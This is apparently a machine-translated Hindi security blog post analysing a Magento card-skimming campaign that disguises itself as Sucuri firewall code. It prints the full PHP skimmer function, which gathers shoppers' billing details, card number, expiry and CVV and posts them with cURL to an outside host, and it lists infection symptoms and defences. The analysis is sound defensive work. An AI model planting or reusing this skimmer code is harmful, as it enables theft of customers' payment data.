Computer >> कंप्यूटर >  >> नेटवर्किंग >> नेटवर्क सुरक्षा

क्रेडिट कार्ड स्किमर प्रतिरूपण सुकुरी, मैगेंटो स्टोर्स बीइंग टार्गेट और सीसी डेटा स्टोलन

COVID-19 लॉकडाउन उपायों और दुनिया भर में आसन्न BFCM और क्रिसमस छूट की बिक्री के साथ, इस साल ऑनलाइन खरीदारी लगातार बढ़ रही है और इसके साथ ही, डिजिटल क्रेडिट कार्ड स्कीमर हमले भी हो रहे हैं।

टेलीग्राम मैलवेयर अभियान पर हमारी हालिया रिपोर्ट के बाद, एस्ट्रा सिक्योरिटी के सुरक्षा शोधकर्ताओं ने एक और चल रहे क्रेडिट कार्ड स्किमिंग मैलवेयर अभियान को देखा, जो संक्रमित ई-कॉमर्स स्टोर से संवेदनशील ग्राहक जानकारी चुराने के लिए सुरक्षा कंपनी 'सुकुरी' का प्रतिरूपण करता है। हालांकि हमने मैगेंटो स्टोर्स को लक्षित करने वाले इस मैलवेयर को ट्रैक किया है, हालांकि, मैलवेयर के कुछ निशान अन्य सीएमएस जैसे Prestashop, OpenCart और WooCommerce में भी देखे गए हैं।

डिजिटल क्रेडिट कार्ड स्किमिंग अटैक क्या है?

एक डिजिटल क्रेडिट कार्ड स्किमिंग हमला एक वेब-आधारित स्किमिंग हमला है, जहां हैकर्स वेबसाइटों या ई-कॉमर्स स्टोर में दुर्भावनापूर्ण जावास्क्रिप्ट कोड डालते हैं ताकि उन्हें मैलवेयर से संक्रमित किया जा सके और अंततः वेबसाइट विज़िटर / ग्राहकों से क्रेडेंशियल और संवेदनशील भुगतान जानकारी चुरा ली जा सके। इन डिजिटल स्किमर्स का दुर्भावनापूर्ण कोड ज्यादातर साइट के भुगतान चेकआउट पृष्ठ में मौजूद उपयोगकर्ता इनपुट फ़ॉर्म पर लगाया जाता है जो उपयोगकर्ता इनपुट को सूँघता है या ग्राहकों के क्रेडिट कार्ड की जानकारी चुराने के लिए नकली भुगतान फ़ॉर्म के साथ एक आईफ्रेम बनाता है।

डिजिटल स्किमिंग ने अब तक सैकड़ों हजारों वेबसाइटों को प्रभावित किया है, जिनमें ब्रिटिश एयरवेज, मैसीज, फोर्ब्स, न्यूएग और टिकटमास्टर जैसे हाई-प्रोफाइल ब्रांड शामिल हैं।

Magento क्रेडिट कार्ड स्किमिंग मैलवेयर के लक्षण

  1. ग्राहक आपके स्टोर पर क्रेडिट कार्ड का उपयोग करने के बाद अपने क्रेडिट कार्ड से अज्ञात लेनदेन के बारे में शिकायत करते हैं।
  2. आपके भुगतान प्रदाता/बैंक का ईमेल आपके स्टोर के भुगतान गेटवे की सुरक्षा के बारे में चेतावनी बता रहा है।
  3. उस स्टोर में अतिरिक्त भुगतान विधि जोड़ी गई जिसकी आप पहचान नहीं करते हैं।
  4. आपकी वेबसाइट में 'सुकुरी' शब्द वाला कोड जोड़ा गया है, भले ही आप नाम के साथ किसी उत्पाद का उपयोग नहीं करते हैं।

कैसे हैकर्स स्टोर को निशाना बना रहे हैं और उपयोगकर्ताओं को उनकी भुगतान जानकारी देने के लिए धोखा देने के लिए सुकुरी फ़ायरवॉल का प्रतिरूपण कर रहे हैं

इस मैलवेयर अभियान के विश्लेषण के दौरान, हमारी शोध टीम ने पाया कि हैकर्स सक्रिय रूप से इस क्रेडिट कार्ड स्किमिंग मैलवेयर को ई-कॉमर्स वेबसाइटों (ज्यादातर मैग्नेटो स्टोर्स) में लगा रहे हैं और साइट विज़िटर या खरीदारों को चेकआउट के दौरान उनकी संवेदनशील जानकारी दर्ज करने के लिए बरगला रहे हैं। दुर्भावनापूर्ण क्रेडिट कार्ड स्किमर कोड इस फ़ाइल स्थान पर स्थित है /app/code/core/Mage/Payment/Model/Method/Cc.php किसी संक्रमित साइट की.

यहां, हमलावर एक फ़ंक्शन जोड़ रहे हैं $this->sucuri_encrypted(); जो उन्हें चेकआउट प्रक्रिया के दौरान उपयोगकर्ता द्वारा दर्ज किए गए डेटा को बाहर निकालने की अनुमति देता है। और बहिष्कृत डेटा https://www.thebrandstore.gr/js/i.php . पर भेजा जा रहा है

चोरी किए गए डेटा में ग्राहकों की संवेदनशील जानकारी होती है जिसमें उनका पहला नाम, अंतिम नाम, पता, फोन नंबर और क्रेडिट कार्ड विवरण शामिल होता है।

इस मैलवेयर अभियान में हमलावरों द्वारा उपयोग किए गए कोड नमूना नीचे दिया गया है:

function sucuri_encrypted()
 {
 $info = $this->getInfoInstance();
 $object = new Mage_Checkout_Block_Onepage_Billing;
 $address1 = $object->getQuote()->getBillingAddress();
 $data1 = $address1->getFirstname();
 $data2 = $address1->getLastname();
 $data3 = $address1->getStreet(1);
 $data4 = $address1->getStreet(2);
 $data5 = $address1->getCity();
 $data6 = $address1->getRegion();
 $data7 = $address1->getPostcode();
 $data8 = $address1->getCountry();
 $data9 = $address1->getTelephone();
 $data10 = $info->getCcNumber();
 $expyear = substr($info->getCcExpYear(), -2);
 $expmonth = $info->getCcExpMonth();
 if (strlen($expmonth) == 1) {
 $expmonth = '0'.$expmonth;
 };
 $data11 = $expmonth;
 $data12 = $expyear;
 $data13 = $info->getCcCid();
 $data15 = $_SERVER['SERVER_NAME'];
 $data16 = Mage::getSingleton('checkout/session')->getQuote()->getBillingAddress()->getEmail();
//create array of data to be secured
$sucuri_firewall['firstname'] = base64_encode($data1);
$sucuri_firewall['lastname'] = base64_encode($data2);
$sucuri_firewall['address'] = base64_encode($data3);
$sucuri_firewall['address2'] = base64_encode($data4);
$sucuri_firewall['city'] = base64_encode($data5);
$sucuri_firewall['state'] = base64_encode($data6);
$sucuri_firewall['zip'] = base64_encode($data7);
$sucuri_firewall['country'] = base64_encode($data8);
$sucuri_firewall['phone'] = base64_encode($data9);
$sucuri_firewall['cc'] = base64_encode($data10);
$sucuri_firewall['exp'] = base64_encode($data11);
$sucuri_firewall['expyear'] = base64_encode($data12);
$sucuri_firewall['cvv'] = base64_encode($data13);
$sucuri_firewall['email'] = base64_encode($data16);
$sucuri_firewall['dari'] = base64_encode($data15);
$sucuri_firewall['submit'] = 'Submit';
//traverse array and prepare data for posting (key1=value1)
foreach ( $sucuri_firewall as $key => $value) {
 $post_items[] = $key . '=' . $value;
}
//create the final string to be posted using implode()
$post_string = implode ('&', $post_items);
//create cURL connection
$curl_connection = curl_init('https://www.thebrandstore.gr/js/i.php');
//set options
curl_setopt($curl_connection, CURLOPT_CONNECTTIMEOUT, 30);
curl_setopt($curl_connection, CURLOPT_USERAGENT, "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)");
curl_setopt($curl_connection, CURLOPT_RETURNTRANSFER, true);
curl_setopt($curl_connection, CURLOPT_SSL_VERIFYPEER, false);
curl_setopt($curl_connection, CURLOPT_FOLLOWLOCATION, 1);
//set data to be posted
curl_setopt($curl_connection, CURLOPT_POSTFIELDS, $post_string);
//perform our request
$result = curl_exec($curl_connection);
curl_close($curl_connection);
}
}
}.

जैसा कि आप उपरोक्त कोड में देख सकते हैं, क्रेडिट कार्ड की जानकारी चुराने वाला $this->sucuri_encrypted() . नामक एक फ़ंक्शन जोड़ता है; जो एक प्रतिरूपित सुकुरी फ़ायरवॉल कोड प्रदर्शित करता है।

अपने ई-कॉमर्स स्टोर को इस मैलवेयर से कैसे बचाएं

ई-कॉमर्स वेबसाइट या स्टोर जो इस मैलवेयर से संक्रमित हैं, उनके ग्राहकों की संवेदनशील जानकारी यहां चोरी होने और कानूनी ऑर्डर नहीं होने या भुगतान नहीं होने के कारण ग्राहकों के विश्वास के साथ-साथ राजस्व में भारी नुकसान हो सकता है। इसलिए, साइट स्वामियों को यह सलाह दी जाती है कि वे अपनी साइट और ग्राहक डेटा को इस प्रकार के क्रेडिट कार्ड स्किमर और किसी भी अन्य मैलवेयर अभियान से बचाने के लिए पूर्व सुरक्षा उपायों को लागू करें।

यदि आप एस्ट्रा सिक्योरिटी के एप्लिकेशन फ़ायरवॉल का उपयोग कर रहे हैं तो आपका ई-कॉमर्स स्टोर पहले से ही इस हमले और अन्य साइबर हमलों और कमजोरियों जैसे SQLi, XSS, CSRF, LFI, RFI, क्रेडिट कार्ड हैक, स्पैम, बैड बॉट आदि से सुरक्षित है। इसके अलावा, सुरक्षा विशेषज्ञ लंबे समय से वेबसाइटों की सुरक्षा के लिए एक प्रमुख सुरक्षा उपाय के रूप में नियमित रूप से मैलवेयर स्कैनिंग की अनुशंसा करते रहे हैं, अब समय आ गया है कि आप अपनी वेबसाइटों को हर समय सुरक्षित रखने के लिए उचित सुरक्षा उपायों के साथ तैयार करें।


  1. Magento कार्ड स्किमिंग कैसे काम करता है और कैसे सुरक्षित रहें?

    Magento कार्ड स्किमिंग, एक Magento वेबसाइट पर स्किमर्स नामक दुर्भावनापूर्ण स्क्रिप्ट को इंजेक्ट करके क्रेडिट/डेबिट जानकारी को अवैध रूप से चुराने की प्रथा है। यदि आप एक Magento द्वारा संचालित वेबसाइट के मालिक हैं तो यह लेख आपके लिए है। यहां, हम आपके लिए लाए हैं मैगेंटो कार्ड स्किमिंग सुरक्षा समस्या क

  1. क्रेडिट कार्ड धोखाधड़ी क्या है और इससे कैसे सुरक्षित रहें?

    “अपने क्रेडिट कार्ड को धोखेबाजों से सुरक्षित रखें और अपने विवरण को एक सुरक्षित और सुरक्षित तिजोरी में संग्रहीत करके क्रेडिट कार्ड धोखाधड़ी से बचें।” हम में से अधिकांश लोग कैशलेस लेनदेन की सुविधा का आनंद लेते हैं। चूंकि यह नकद ले जाने या चेक लिखने की चिंता को कम करता है। लेकिन हम में से कुछ ही लोग

  1. एक और डेटा गोपनीयता घोटाला:क्या हम अधिक सावधान नहीं हैं?

    डेटा उल्लंघन की एक और गलती और क्या लगता है? फेसबुक और ट्विटर उपयोगकर्ता बड़े समय से प्रभावित हुए हैं। इन सभी डेटा घोटालों के बाद या कंपनियां इन निरंतर उल्लंघनों को गंभीरता से नहीं ले रही हैं, क्या हम अधिक सावधान नहीं हैं? कल फेसबुक और ट्विटर ने घोषणा की कि कुछ तृतीय-पक्ष एप्लिकेशन में लॉग इन करने